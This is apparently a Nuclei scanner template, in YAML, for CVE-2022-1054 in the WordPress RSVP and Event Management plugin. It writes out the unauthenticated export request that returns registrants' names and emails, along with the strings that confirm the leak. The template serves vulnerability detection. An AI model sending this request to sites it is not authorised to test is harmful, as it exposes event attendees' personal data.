34 lines
1.1 KiB
YAML
34 lines
1.1 KiB
YAML
id: CVE-2022-1054
|
|
|
|
info:
|
|
name: RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export
|
|
author: Akincibor
|
|
severity: medium
|
|
description: The RSVP and Event Management Plugin WordPress plugin before 2.7.8 does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of user registered for events
|
|
reference:
|
|
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-1054
|
|
cwe-id: CWE-862
|
|
tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'RSVP Status'
|
|
- '"First Name"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|